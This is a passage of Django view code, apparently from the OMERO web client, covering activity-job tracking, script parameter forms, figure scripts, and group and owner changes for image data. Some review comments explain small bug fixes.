                                    "type": v.__class__.__name__[:-1],
                                }
                                obj_data["browse_url"] = getObjectUrl(conn, v)
                                if v.isLoaded() and hasattr(v, "file"):
                                    # try:
                                    mimetypes = {
                                        "image/png": "png",
                                        "image/jpeg": "jpeg",
                                        "text/plain": "text",
                                    }
                                    if v.file.mimetype.val in mimetypes:
                                        obj_data["fileType"] = mimetypes[
                                            v.file.mimetype.val
                                        ]
                                        obj_data["fileId"] = v.file.id.val
                                        obj_data["name"] = v.file.name.val
                                    # except Exception:
                                    #     pass
                                if v.isLoaded() and hasattr(v, "name"):
                                    # E.g Image, OriginalFile etc
                                    name = unwrap(v.name)
                                    if name is not None:
                                        # E.g. FileAnnotation has null name
                                        obj_data["name"] = name
                                rMap[key] = obj_data
                            else:
                                rMap[key] = unwrap(v)
                    update_callback(request, cbString, results=rMap)
                else:
                    in_progress += 1
    # having updated the request.session, we can now prepare the data for http
    # response
    rv = {}
    for cbString in request.session.get("callback").keys():
        # make a copy of the map in session, so that we can replace non
        # json-compatible objects, without modifying session
        rv[cbString] = copy.copy(request.session["callback"][cbString])
    # return json (used for testing)
    if "template" in kwargs and kwargs["template"] == "json":
        for cbString in request.session.get("callback").keys():
            rv[cbString]["start_time"] = str(
                request.session["callback"][cbString]["start_time"]
            )
        rv["inprogress"] = in_progress
        rv["failure"] = failure
        rv["jobs"] = len(request.session["callback"])
        return JsonResponse(rv)  # json
    jobs = []
    new_errors = False
    for key, data in rv.items():
        # E.g. key: ProcessCallback/39f77932-c447-40d8-8f99-910b5a531a25 -t:tcp -h 10.211.55.2 -p 54727:tcp -h 10.37.129.2 -p 54727:tcp -h 10.12.2.21 -p 54727 # noqa
        # create id we can use as html id,
        # E.g. 39f77932-c447-40d8-8f99-910b5a531a25
        if len(key.split(" ")) > 0:
            htmlId = key.split(" ")[0]
            if len(htmlId.split("/")) > 1:
                htmlId = htmlId.split("/")[1]
        rv[key]["id"] = htmlId
        rv[key]["key"] = key
        if key in new_results:
            rv[key]["new"] = True
        if "error" in data and data["error"] > 0:
            new_errors = True
        jobs.append(rv[key])
    # Newest jobs first
    jobs.sort(key=lambda x: x["start_time"], reverse=True)
    context = {
        "sizeOfJobs": len(request.session["callback"]),
        "jobs": jobs,
        "inprogress": in_progress,
        "new_results": len(new_results),
        "new_errors": new_errors,
        "failure": failure,
    }
    context["template"] = "webclient/activities/activitiesContent.html"
    return context
@login_required()
def activities_update(request, action, **kwargs):
    """
    Clear jobs from request.session['callback'] when 'action' is 'clean':
    either a single job (if 'jobKey' is specified in POST) or all jobs
    apart from those still in progress.
    """
    request.session.modified = True
    if action == "clean":
        callbacks = request.session["callback"]
        if "jobKey" in request.POST:
            # Remove one specific job and report whether it existed.
            job_key = request.POST.get("jobKey")
            removed = job_key in callbacks
            if removed:
                del callbacks[job_key]
                request.session.modified = True
            return JsonResponse({"removed": removed})
        # Remove every job that has already completed or failed.
        finished = [k for k, d in list(callbacks.items())
                    if d["status"] != "in progress"]
        for key in finished:
            del callbacks[key]
    return HttpResponse("OK")
##############################################################################
# User Photo
@login_required()
def avatar(request, oid=None, conn=None, **kwargs):
    """Serve the experimenter's photo as a JPEG response."""
    photo = conn.getExperimenterPhoto(oid)
    return HttpResponse(photo, content_type="image/jpeg")
##############################################################################
# webgateway extention
@login_required()
def image_viewer(request, iid, share_id=None, **kwargs):
    """Delegate to webgateway's full viewer, using share connection if appropriate."""
    if share_id is not None:
        server = reverse("webindex") + share_id
    else:
        server = reverse("webindex")
    # remove any trailing slash
    kwargs["viewport_server"] = server.rstrip("/")
    return webgateway_views.full_viewer(request, iid, **kwargs)
##############################################################################
# scripting service....
@login_required()
@render_response()
def list_scripts(request, conn=None, **kwargs):
    """
    List the available scripts - just official scripts for now.
    If all scripts live under a single top-level directory it is removed
    by default; use ?full_path=true to keep it.
    """
    scriptService = conn.getScriptService()
    scripts = scriptService.getScripts()
    scripts_to_ignore = (
        request.session.get("server_settings", {})
        .get("scripts_to_ignore", "")
        .split(",")
    )
    # Build a hierarchical menu: each directory is a nested dict, each
    # script a 'name': <id> leaf.
    scriptMenu = {}
    for s in scripts:
        scriptId = s.id.val
        fullpath = os.path.join(s.path.val, s.name.val)
        if fullpath in scripts_to_ignore:
            logger.info("Ignoring script %r" % fullpath)
            continue
        node = scriptMenu
        parts = fullpath.split(os.path.sep)
        for depth, part in enumerate(parts):
            if not part:
                continue
            if part not in node:
                # Leaf (last path component) stores the script id,
                # intermediate components become sub-directories.
                node[part] = scriptId if depth + 1 == len(parts) else {}
            node = node[part]

    def _to_sorted_list(node):
        # Convert nested dicts into sorted lists of {'name', 'ul'/'id'}.
        entries = []
        for name, value in node.items():
            if isinstance(value, dict):
                entries.append({"name": name, "ul": _to_sorted_list(value)})
            else:
                entries.append({"name": name, "id": value})
        entries.sort(key=lambda e: e["name"].lower())
        return entries

    scriptList = _to_sorted_list(scriptMenu)
    # If we have a single top-level directory, we can skip it
    if not request.GET.get("full_path") and len(scriptList) == 1:
        scriptList = scriptList[0]["ul"]
    return scriptList
@login_required()
@render_response()
def script_ui(request, scriptId, conn=None, **kwargs):
    """
    Generates an html form for the parameters of a defined script.

    Builds 'paramData' (script name, description, authors, etc.) and a list
    of input descriptors sorted by their 'grouping' code, nesting child
    parameters (e.g. "03.1") under their parent (e.g. "03"). Request GET
    parameters may pre-populate defaults, including picking the
    Data_Type / IDs pair from e.g. ?Image=1,2 or resolving ?Well=3 to images.

    :param request:  Django request
    :param scriptId: ID of the script to build a UI for
    :param conn:     BlitzGateway connection (injected by @login_required)
    :return:         Context dict for 'webclient/scripts/script_ui.html', or
                     a 'no processor' template dict if none is available
    """
    scriptService = conn.getScriptService()

    try:
        params = scriptService.getParams(long(scriptId))
    except Exception as ex:
        # Fix: Python 3 exceptions have no 'message' attribute, so the
        # previous direct ex.message access raised AttributeError on py3.
        # Use a py2/py3-safe lookup (same pattern as run_script() below).
        msg = ex.message if hasattr(ex, "message") else str(ex)
        if msg.lower().startswith("no processor available"):
            return {
                "template": "webclient/scripts/no_processor.html",
                "scriptId": scriptId,
            }
        raise ex
    if params is None:
        return HttpResponse()

    paramData = {}

    paramData["id"] = long(scriptId)
    paramData["name"] = params.name.replace("_", " ")
    paramData["description"] = params.description
    paramData["authors"] = ", ".join([a for a in params.authors])
    paramData["contact"] = params.contact
    paramData["version"] = params.version
    paramData["institutions"] = ", ".join([i for i in params.institutions])

    inputs = []  # use a list so we can sort by 'grouping'
    Data_TypeParam = None
    IDsParam = None
    for key, param in params.inputs.items():
        i = {}
        i["name"] = key.replace("_", " ")
        i["key"] = key
        if not param.optional:
            i["required"] = True
        i["description"] = param.description
        if param.min:
            i["min"] = str(param.min.getValue())
        if param.max:
            i["max"] = str(param.max.getValue())
        if param.values:
            i["options"] = [v.getValue() for v in param.values.getValue()]
        if param.useDefault:
            i["default"] = unwrap(param.prototype)
            if isinstance(i["default"], omero.model.IObject):
                i["default"] = None
        pt = unwrap(param.prototype)
        # Flag the widget type the template should render for this parameter
        if pt.__class__.__name__ == "dict":
            i["map"] = True
        elif pt.__class__.__name__ == "list":
            i["list"] = True
            if "default" in i:
                i["default"] = ",".join([str(d) for d in i["default"]])
        elif isinstance(pt, bool):
            i["boolean"] = True
        elif isinstance(pt, int) or isinstance(pt, long):
            # will stop the user entering anything other than numbers.
            i["number"] = "number"
        elif isinstance(pt, float):
            i["number"] = "float"

        # if we got a value for this key in the page request, use this as
        # default
        if request.GET.get(key, None) is not None:
            i["default"] = request.GET.get(key, None)

        # E.g "" (string) or [0] (int list) or 0.0 (float)
        i["prototype"] = unwrap(param.prototype)
        i["grouping"] = param.grouping
        inputs.append(i)

        if key == "IDs":
            IDsParam = i  # remember these...
        if key == "Data_Type":
            Data_TypeParam = i
    inputs.sort(key=lambda i: i["grouping"])

    # if we have Data_Type param - use the request parameters to populate IDs
    if (
        Data_TypeParam is not None
        and IDsParam is not None
        and "options" in Data_TypeParam
    ):
        IDsParam["default"] = ""
        for dtype in Data_TypeParam["options"]:
            if request.GET.get(dtype, None) is not None:
                Data_TypeParam["default"] = dtype
                IDsParam["default"] = request.GET.get(dtype, "")
                break  # only use the first match
        # if we've not found a match, check whether we have "Well" selected
        if len(IDsParam["default"]) == 0 and request.GET.get("Well", None) is not None:
            if "Image" in Data_TypeParam["options"]:
                wellIds = [long(j) for j in request.GET.get("Well", None).split(",")]
                wellIdx = 0
                try:
                    wellIdx = int(request.GET.get("Index", 0))
                except Exception:
                    pass
                wells = conn.getObjects("Well", wellIds)
                imgIds = [str(w.getImage(wellIdx).getId()) for w in wells]
                Data_TypeParam["default"] = "Image"
                IDsParam["default"] = ",".join(imgIds)

    # try to determine hierarchies in the groupings - ONLY handle 1 hierarchy
    # level now (not recursive!)
    for i in range(len(inputs)):
        if len(inputs) <= i:
            # we may remove items from inputs as we go - need to check
            break
        param = inputs[i]
        grouping = param["grouping"]  # E.g 03
        param["children"] = list()
        while len(inputs) > i + 1:
            nextGrp = inputs[i + 1]["grouping"]  # E.g. 03.1
            if nextGrp.split(".")[0] == grouping:
                param["children"].append(inputs[i + 1])
                inputs.pop(i + 1)
            else:
                break

    paramData["inputs"] = inputs

    return {
        "template": "webclient/scripts/script_ui.html",
        "paramData": paramData,
        "scriptId": scriptId,
    }
@login_required()
@render_response()
def figure_script(request, scriptName, conn=None, **kwargs):
    """
    Show a UI for running figure scripts

    :param scriptName: One of 'SplitView', 'Thumbnail' or 'MakeMovie' -
                       selects both the server script and the template
    :param conn:       BlitzGateway connection (injected by @login_required)
    :return:           Template context dict (rendered by @render_response)
    """
    imageIds = request.GET.get("Image", None)  # comma - delimited list
    datasetIds = request.GET.get("Dataset", None)
    wellIds = request.GET.get("Well", None)
    if wellIds is not None:
        # Wells are resolved to their images at the requested field 'Index'
        wellIds = [long(i) for i in wellIds.split(",")]
        wells = conn.getObjects("Well", wellIds)
        wellIdx = getIntOrDefault(request, "Index", 0)
        imageIds = [str(w.getImage(wellIdx).getId()) for w in wells]
        imageIds = ",".join(imageIds)
    if imageIds is None and datasetIds is None:
        return HttpResponse(
            "Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
        )

    def validateIds(dtype, ids):
        # Validate comma-separated IDs against the server (404 if none
        # exist) and switch group context to the first valid object's group.
        ints = [int(oid) for oid in ids.split(",")]
        validObjs = {}
        for obj in conn.getObjects(dtype, ints):
            validObjs[obj.id] = obj
        filteredIds = [iid for iid in ints if iid in validObjs.keys()]
        if len(filteredIds) == 0:
            raise Http404("No %ss found with IDs %s" % (dtype, ids))
        else:
            # Now we can specify group context - All should be same group
            gid = list(validObjs.values())[0].getDetails().group.id.val
            conn.SERVICE_OPTS.setOmeroGroup(gid)
        return filteredIds, validObjs

    context = {}
    if imageIds is not None:
        imageIds, validImages = validateIds("Image", imageIds)
        context["idString"] = ",".join([str(i) for i in imageIds])
        context["dtype"] = "Image"
    if datasetIds is not None:
        datasetIds, validDatasets = validateIds("Dataset", datasetIds)
        context["idString"] = ",".join([str(i) for i in datasetIds])
        context["dtype"] = "Dataset"

    if scriptName == "SplitView":
        scriptPath = "/omero/figure_scripts/Split_View_Figure.py"
        template = "webclient/scripts/split_view_figure.html"
        # Lookup Tags & Datasets (for row labels)
        imgDict = []  # A list of data about each image.
        for iId in imageIds:
            data = {"id": iId}
            img = validImages[iId]
            data["name"] = img.getName()
            tags = [
                ann.getTextValue()
                for ann in img.listAnnotations()
                if ann._obj.__class__ == omero.model.TagAnnotationI
            ]
            data["tags"] = tags
            data["datasets"] = [d.getName() for d in img.listParents()]
            imgDict.append(data)

        # Use the first image as a reference
        image = validImages[imageIds[0]]
        context["imgDict"] = imgDict
        context["image"] = image
        context["channels"] = image.getChannels()

    elif scriptName == "Thumbnail":
        scriptPath = "/omero/figure_scripts/Thumbnail_Figure.py"
        template = "webclient/scripts/thumbnail_figure.html"

        def loadImageTags(imageIds):
            # Load Tag annotations for the images, returning per-image tag
            # lists plus the (possibly duplicated) tag objects themselves.
            tagLinks = conn.getAnnotationLinks("Image", parent_ids=imageIds)
            linkMap = {}  # group tags. {imageId: [tags]}
            tagMap = {}
            for iId in imageIds:
                linkMap[iId] = []
            for link in tagLinks:
                c = link.getChild()
                if c._obj.__class__ == omero.model.TagAnnotationI:
                    tagMap[c.id] = c
                    linkMap[link.getParent().id].append(c)
            imageTags = []
            for iId in imageIds:
                imageTags.append({"id": iId, "tags": linkMap[iId]})
            tags = []
            for tId, t in tagMap.items():
                tags.append(t)
            return imageTags, tags

        thumbSets = []  # multiple collections of images
        tags = []
        figureName = "Thumbnail_Figure"
        if datasetIds is not None:
            # One thumbnail set per dataset; figure named after the first
            for d in conn.getObjects("Dataset", datasetIds):
                imgIds = [i.id for i in d.listChildren()]
                imageTags, ts = loadImageTags(imgIds)
                thumbSets.append({"name": d.getName(), "imageTags": imageTags})
                tags.extend(ts)
            figureName = thumbSets[0]["name"]
        else:
            imageTags, ts = loadImageTags(imageIds)
            thumbSets.append({"name": "images", "imageTags": imageTags})
            tags.extend(ts)
            parent = conn.getObject("Image", imageIds[0]).getParent()
            figureName = parent.getName() or "Thumbnail Figure"
            context["parent_id"] = parent.getId()
        uniqueTagIds = set()  # remove duplicates
        uniqueTags = []
        for t in tags:
            if t.id not in uniqueTagIds:
                uniqueTags.append(t)
                uniqueTagIds.add(t.id)
        uniqueTags.sort(key=lambda x: x.getTextValue().lower())
        context["thumbSets"] = thumbSets
        context["tags"] = uniqueTags
        context["figureName"] = figureName.replace(" ", "_")

    elif scriptName == "MakeMovie":
        scriptPath = "/omero/export_scripts/Make_Movie.py"
        template = "webclient/scripts/make_movie.html"

        # expect to run on a single image at a time
        image = conn.getObject("Image", imageIds[0])
        # remove extension (if 3 chars or less)
        movieName = image.getName().rsplit(".", 1)
        if len(movieName) > 1 and len(movieName[1]) > 3:
            movieName = ".".join(movieName)
        else:
            movieName = movieName[0]
        # make sure name is not a path
        context["movieName"] = os.path.basename(movieName)
        chs = []
        for c in image.getChannels():
            chs.append(
                {
                    "active": c.isActive(),
                    "color": c.getColor().getHtml(),
                    "label": c.getLabel(),
                }
            )
        context["channels"] = chs
        context["sizeT"] = image.getSizeT()
        context["sizeZ"] = image.getSizeZ()

    # NOTE(review): an unknown scriptName leaves scriptPath/template unbound
    # and would raise NameError below - presumably URLs restrict the values.
    scriptService = conn.getScriptService()
    scriptId = scriptService.getScriptID(scriptPath)
    if scriptId < 0:
        raise AttributeError("No script found for path '%s'" % scriptPath)

    context["template"] = template
    context["scriptId"] = scriptId
    return context
@login_required()
@render_response()
def fileset_check(request, action, conn=None, **kwargs):
    """
    Check whether Images / Datasets etc contain partial Multi-image filesets.
    Used by chgrp or delete dialogs to test whether we can perform this
    'action'.

    :param action: the operation being attempted; 'chgrp' is shown as 'move'
    :return:       context dict for the fileset-check dialog template
    """
    # Collect the requested object IDs from the query string, keyed by type
    requested = {}
    for obj_type in ("Image", "Dataset", "Project"):
        raw_ids = request.GET.get(obj_type, None)
        if raw_ids is not None:
            requested[obj_type] = [int(oid) for oid in raw_ids.split(",")]

    split_filesets = conn.getContainerService().getImagesBySplitFilesets(
        requested, None, conn.SERVICE_OPTS
    )

    # For each split fileset, report the images included in the request
    # (True) vs those left behind that block the action (False)
    splits = [
        {
            "id": fs_id,
            "attempted_iids": included[True],
            "blocking_iids": included[False],
        }
        for fs_id, included in split_filesets.items()
    ]

    return {
        "split_filesets": splits,
        "action": "move" if action == "chgrp" else action,
        "template": "webclient/activities/fileset_check_dialog_content.html",
    }
def getAllObjects(
    conn, project_ids, dataset_ids, image_ids, screen_ids, plate_ids, experimenter_id
):
    """
    Given a list of containers and images, calculate all the descendants
    and necessary siblings (for any filesets)

    :param conn:            BlitzGateway connection
    :param project_ids:     Project IDs whose datasets/images are expanded
    :param dataset_ids:     Dataset IDs whose images are expanded
    :param image_ids:       Image IDs (extended with fileset siblings)
    :param screen_ids:      Screen IDs whose plates/images are expanded
    :param plate_ids:       Plate IDs whose well-sample images are expanded
    :param experimenter_id: Currently unused in this function body
                            (see the TODO about orphaned directories)
    :return: dict with 'remove' (all affected object IDs by type) and
             'childless' (containers left with no children, plus an
             'orphaned' flag)
    """
    # TODO Handle None inputs, maybe add defaults
    params = omero.sys.ParametersI()
    qs = conn.getQueryService()

    # Work with sets so expansion below never duplicates IDs
    project_ids = set(project_ids)
    dataset_ids = set(dataset_ids)
    image_ids = set(image_ids)
    fileset_ids = set([])
    plate_ids = set(plate_ids)
    screen_ids = set(screen_ids)

    # Get any datasets for projects
    if project_ids:
        params.map = {}
        params.map["pids"] = rlist([rlong(x) for x in list(project_ids)])
        q = """
            select pdlink.child.id
            from ProjectDatasetLink pdlink
            where pdlink.parent.id in (:pids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            dataset_ids.add(e[0].val)

    # Get any plates for screens
    if screen_ids:
        params.map = {}
        params.map["sids"] = rlist([rlong(x) for x in screen_ids])
        q = """
            select splink.child.id
            from ScreenPlateLink splink
            where splink.parent.id in (:sids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            plate_ids.add(e[0].val)

    # Get any images for datasets
    if dataset_ids:
        params.map = {}
        params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
        q = """
            select dilink.child.id,
                   dilink.child.fileset.id
            from DatasetImageLink dilink
            where dilink.parent.id in (:dids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            image_ids.add(e[0].val)
            # Some images in Dataset may not have fileset
            if e[1] is not None:
                fileset_ids.add(e[1].val)

    # Get any images for plates
    # TODO Seemed no need to add the filesets for plates as it isn't possible
    # to link it from outside of its plate. This may be true for the client,
    # but it certainly isn't true for the model so maybe allow this to also get
    # filesets
    if plate_ids:
        params.map = {}
        params.map["plids"] = rlist([rlong(x) for x in plate_ids])
        q = """
            select ws.image.id
            from WellSample ws
            join ws.plateAcquisition pa
            where pa.plate.id in (:plids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            image_ids.add(e[0].val)

    # Get any extra images due to filesets
    if fileset_ids:
        # Pull in sibling images of multi-image filesets so filesets are
        # never split by the operation
        params.map = {}
        params.map["fsids"] = rlist([rlong(x) for x in fileset_ids])
        q = """
            select image.id
            from Image image
            left outer join image.datasetLinks dilink
            where image.fileset.id in (select fs.id
                                       from Image im
                                       join im.fileset fs
                                       where fs.id in (:fsids)
                                       group by fs.id
                                       having count(im.id)>1)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            image_ids.add(e[0].val)

    # Get any additional datasets that may need updating as their children have
    # been snatched.
    # TODO Need to differentiate which orphaned directories need refreshing
    extra_dataset_ids = set([])
    extra_orphaned = False
    if image_ids:
        params.map = {
            "iids": rlist([rlong(x) for x in image_ids]),
        }
        exclude_datasets = ""
        if dataset_ids:
            params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
            # Make sure to allow parentless results as well as those
            # that do not match a dataset being removed
            exclude_datasets = """
                               and (
                                   dilink.parent.id not in (:dids)
                                   or dilink.parent.id = null
                               )
                               """
        # Datasets whose entire remaining child list is being removed
        q = (
            """
            select distinct dilink.parent.id
            from Image image
            left outer join image.datasetLinks dilink
            where image.id in (:iids)
            %s
            and (select count(dilink2.child.id)
                 from DatasetImageLink dilink2
                 where dilink2.parent.id = dilink.parent.id
                 and dilink2.child.id not in (:iids)) = 0
            """
            % exclude_datasets
        )
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            if e:
                extra_dataset_ids.add(e[0].val)
            else:
                extra_orphaned = True

    # Get any additional projects that may need updating as their children have
    # been snatched. There is no need to check for orphans because if a dataset
    # is being removed from somewhere else, it can not exist as an orphan.
    extra_project_ids = set([])
    if dataset_ids:
        params.map = {"dids": rlist([rlong(x) for x in dataset_ids])}
        exclude_projects = ""
        if project_ids:
            params.map["pids"] = rlist([rlong(x) for x in project_ids])
            exclude_projects = "and pdlink.parent.id not in (:pids)"
        q = (
            """
            select distinct pdlink.parent.id
            from ProjectDatasetLink pdlink
            where pdlink.child.id in (:dids)
            %s
            and (select count(pdlink2.child.id)
                 from ProjectDatasetLink pdlink2
                 where pdlink2.parent.id = pdlink.parent.id
                 and pdlink2.child.id not in (:dids)) = 0
            """
            % exclude_projects
        )
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            extra_project_ids.add(e[0].val)

    # We now have the complete list of objects that will change group
    # We also have an additional list of datasets/projects that may have had
    # snatched children and thus may need updating in the client if the
    # dataset/project has gone from N to 0 children
    result = {
        # These objects are completely removed
        "remove": {
            "project": list(project_ids),
            "dataset": list(dataset_ids),
            "screen": list(screen_ids),
            "plate": list(plate_ids),
            "image": list(image_ids),
        },
        # These objects now have no children
        "childless": {
            "project": list(extra_project_ids),
            "dataset": list(extra_dataset_ids),
            "orphaned": extra_orphaned,
        },
    }
    return result
@require_POST
@login_required()
def chgrpDryRun(request, conn=None, **kwargs):
    # Convenience endpoint: a dryRun() fixed to the 'chgrp' action
    return dryRun(request, action="chgrp", conn=conn, **kwargs)
@require_POST
@login_required()
def dryRun(request, action, conn=None, **kwargs):
    """Submit chgrp or chown dry-run

    POST parameters list target object IDs by type (e.g. Image=1,2);
    'group_id' (for chgrp) or 'owner_id' (for chown) identifies the
    destination.

    :param action: either 'chgrp' or 'chown'
    :return:       HttpResponse whose body is the dry-run job handle (jobId)
    """
    targetObjects = {}
    dtypes = ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]
    for dtype in dtypes:
        oids = request.POST.get(dtype, None)
        if oids is not None:
            obj_ids = [int(oid) for oid in oids.split(",")]
            targetObjects[dtype] = obj_ids

    if action == "chgrp":
        target_id = getIntOrDefault(request, "group_id", None)
    elif action == "chown":
        target_id = getIntOrDefault(request, "owner_id", None)
    else:
        # Fix: previously an unknown action left target_id unbound and
        # raised UnboundLocalError below; fail with an explicit 400 instead.
        return HttpResponseBadRequest("Unknown action: %s" % action)

    handle = conn.submitDryRun(action, targetObjects, target_id)
    jobId = str(handle)
    return HttpResponse(jobId)
@login_required()
def chgrp(request, conn=None, **kwargs):
    """
    Moves data to a new group, using the chgrp queue.
    Handles submission of chgrp form: all data in POST.
    Adds the callback handle to the request.session['callback']['jobId']

    POST parameters: 'group_id' (target group), object IDs keyed by type
    (e.g. Image=1,2), optional 'fileset' IDs, optional 'target_id' or
    'new_container_name'/'new_container_type' for the destination container.
    Returns JSON with an 'update' map of objects changed by the operation.
    """
    if not request.method == "POST":
        return JsonResponse({"Error": "Need to POST to chgrp"}, status=405)

    # Get the target group_id
    group_id = getIntOrDefault(request, "group_id", None)
    if group_id is None:
        return JsonResponse({"Error": "chgrp: No group_id specified"})
    group_id = long(group_id)

    def getObjectOwnerId(r):
        # Owner of the first POSTed object found - used below to set the
        # user context so that links are created as the data's owner
        for t in ["Dataset", "Image", "Plate"]:
            ids = r.POST.get(t, None)
            if ids is not None:
                for o in list(conn.getObjects(t, ids.split(","))):
                    return o.getDetails().owner.id.val

    group = conn.getObject("ExperimenterGroup", group_id)
    new_container_name = request.POST.get("new_container_name", None)
    new_container_type = request.POST.get("new_container_type", None)
    container_id = None

    # Context must be set to owner of data, E.g. to create links.
    ownerId = getObjectOwnerId(request)
    conn.SERVICE_OPTS.setOmeroUser(ownerId)
    if (
        new_container_name is not None
        and len(new_container_name) > 0
        and new_container_type is not None
    ):
        # Create the destination container in the target group
        conn.SERVICE_OPTS.setOmeroGroup(group_id)
        container_id = conn.createContainer(new_container_type, new_container_name)
    # No new container, check if target is specified
    if container_id is None:
        # E.g. "dataset-234"
        target_id = request.POST.get("target_id", None)
        container_id = target_id is not None and target_id.split("-")[1] or None
    dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
    for dtype in dtypes:
        # Get all requested objects of this type
        oids = request.POST.get(dtype, None)
        if oids is not None:
            obj_ids = [int(oid) for oid in oids.split(",")]
            # TODO Doesn't the filesets only apply to images?
            # if 'filesets' are specified, make sure we move ALL Fileset Images
            fsIds = request.POST.getlist("fileset")
            if len(fsIds) > 0:
                # If a dataset is being moved and there is a split fileset
                # then those images need to go somewhere in the new
                if dtype == "Dataset":
                    conn.regroupFilesets(dsIds=obj_ids, fsIds=fsIds)
                else:
                    for fs in conn.getObjects("Fileset", fsIds):
                        obj_ids.extend([i.id for i in fs.copyImages()])
                    obj_ids = list(set(obj_ids))  # remove duplicates
            logger.debug("chgrp to group:%s %s-%s" % (group_id, dtype, obj_ids))
            handle = conn.chgrpObjects(dtype, obj_ids, group_id, container_id)
            jobId = str(handle)
            # Record the job in the session so the Activities panel can poll it
            request.session["callback"][jobId] = {
                "job_type": "chgrp",
                "group": group.getName(),
                "to_group_id": group_id,
                "dtype": dtype,
                "obj_ids": obj_ids,
                "job_name": "Change group",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
            request.session.modified = True

    # Update contains a list of images/containers that need to be
    # updated.
    project_ids = request.POST.get("Project", [])
    dataset_ids = request.POST.get("Dataset", [])
    image_ids = request.POST.get("Image", [])
    screen_ids = request.POST.get("Screen", [])
    plate_ids = request.POST.get("Plate", [])

    if project_ids:
        project_ids = [long(x) for x in project_ids.split(",")]
    if dataset_ids:
        dataset_ids = [long(x) for x in dataset_ids.split(",")]
    if image_ids:
        image_ids = [long(x) for x in image_ids.split(",")]
    if screen_ids:
        screen_ids = [long(x) for x in screen_ids.split(",")]
    if plate_ids:
        plate_ids = [long(x) for x in plate_ids.split(",")]

    # TODO Change this user_id to be an experimenter_id in the request as it
    # is possible that a user is chgrping data from another user so it is
    # that users orphaned that will need updating. Or maybe all orphaned
    # directories could potentially need updating?

    # Create a list of objects that have been changed by this operation. This
    # can be used by the client to visually update.
    update = getAllObjects(
        conn,
        project_ids,
        dataset_ids,
        image_ids,
        screen_ids,
        plate_ids,
        request.session.get("user_id"),
    )

    # return HttpResponse("OK")
    return JsonResponse({"update": update})
@login_required()
def chown(request, conn=None, **kwargs):
    """
    Moves data to a new owner, using the chown queue.
    Handles submission of chown form: all data in POST.
    Adds the callback handle to the request.session['callback']['jobId']

    POST parameters: 'owner_id' (target Experimenter) and object IDs keyed
    by type (e.g. Image=1,2). Returns JSON with the list of 'jobIds'.
    """
    if not request.method == "POST":
        return JsonResponse({"Error": "Need to POST to chown"}, status=405)

    # Get the target owner_id
    owner_id = getIntOrDefault(request, "owner_id", None)
    if owner_id is None:
        return JsonResponse({"Error": "chown: No owner_id specified"})
    owner_id = int(owner_id)
    exp = conn.getObject("Experimenter", owner_id)
    if exp is None:
        # Fix: the original format string had no placeholder, so applying
        # '%' to it raised a TypeError instead of returning this error.
        return JsonResponse({"Error": "chown: Experimenter %s not found" % owner_id})
    dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
    jobIds = []
    for dtype in dtypes:
        # Get all requested objects of this type
        oids = request.POST.get(dtype, None)
        if oids is not None:
            obj_ids = [int(oid) for oid in oids.split(",")]
            logger.debug("chown to owner:%s %s-%s" % (owner_id, dtype, obj_ids))
            handle = conn.chownObjects(dtype, obj_ids, owner_id)
            jobId = str(handle)
            jobIds.append(jobId)
            # Record the job in the session so the Activities panel can poll it
            request.session["callback"][jobId] = {
                "job_type": "chown",
                "owner": exp.getFullName(),
                "to_owner_id": owner_id,
                "dtype": dtype,
                "obj_ids": obj_ids,
                "job_name": "Change owner",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
    request.session.modified = True
    return JsonResponse({"jobIds": jobIds})
@login_required(setGroupContext=True)
def script_run(request, scriptId, conn=None, **kwargs):
    """
    Runs a script using values in a POST

    Builds an input map from the POSTed form values, converting each value
    to the rtype required by the script's parameter prototypes, then
    delegates to run_script(). Returns the JSON produced by run_script().
    """
    scriptService = conn.getScriptService()

    inputMap = {}

    sId = long(scriptId)

    try:
        params = scriptService.getParams(sId)
    except Exception as x:
        # NOTE(review): Python 3 exceptions have no 'message' attribute, so
        # this access would raise AttributeError on py3 - consider
        # getattr(x, "message", str(x)) as used in run_script() below.
        if x.message and x.message.startswith("No processor available"):
            # Delegate to run_script() for handling 'No processor available'
            rsp = run_script(request, conn, sId, inputMap, scriptName="Script")
            return JsonResponse(rsp)
        else:
            raise
    params = scriptService.getParams(sId)
    scriptName = params.name.replace("_", " ").replace(".py", "")

    logger.debug("Script: run with request.POST: %s" % request.POST)

    # upload new file
    fileupload = (
        "file_annotation" in request.FILES and request.FILES["file_annotation"] or None
    )
    fileAnnId = None
    if fileupload is not None and fileupload != "":
        manager = BaseContainer(conn)
        fileAnnId = manager.createFileAnnotations(fileupload, [])

    for key, param in params.inputs.items():
        prototype = param.prototype
        pclass = prototype.__class__

        # The uploaded file annotation (if any) supplies 'File_Annotation'
        if key == "File_Annotation" and fileAnnId is not None:
            inputMap[key] = pclass(str(fileAnnId))
            continue

        # handle bool separately, since unchecked checkbox will not be in
        # request.POST
        if pclass == omero.rtypes.RBoolI:
            value = key in request.POST
            inputMap[key] = pclass(value)
            continue

        if pclass.__name__ == "RMapI":
            # Map values are POSTed as <key>_key0/<key>_value0, _key1/... rows
            keyName = "%s_key0" % key
            valueName = "%s_value0" % key
            row = 0
            paramMap = {}
            while keyName in request.POST:
                # the key and value don't have any data-type defined by
                # scripts - just use string
                k = str(request.POST[keyName])
                v = request.POST[valueName]
                if len(k) > 0 and len(v) > 0:
                    paramMap[str(k)] = v
                row += 1
                keyName = "%s_key%d" % (key, row)
                valueName = "%s_value%d" % (key, row)
            if len(paramMap) > 0:
                inputMap[key] = wrap(paramMap)
            continue

        if key in request.POST:
            if pclass == omero.rtypes.RListI:
                values = request.POST.getlist(key)
                if len(values) == 0:
                    continue
                if len(values) == 1:  # process comma-separated list
                    if len(values[0]) == 0:
                        continue
                    values = values[0].split(",")

                # try to determine 'type' of values in our list
                listClass = omero.rtypes.RStringI
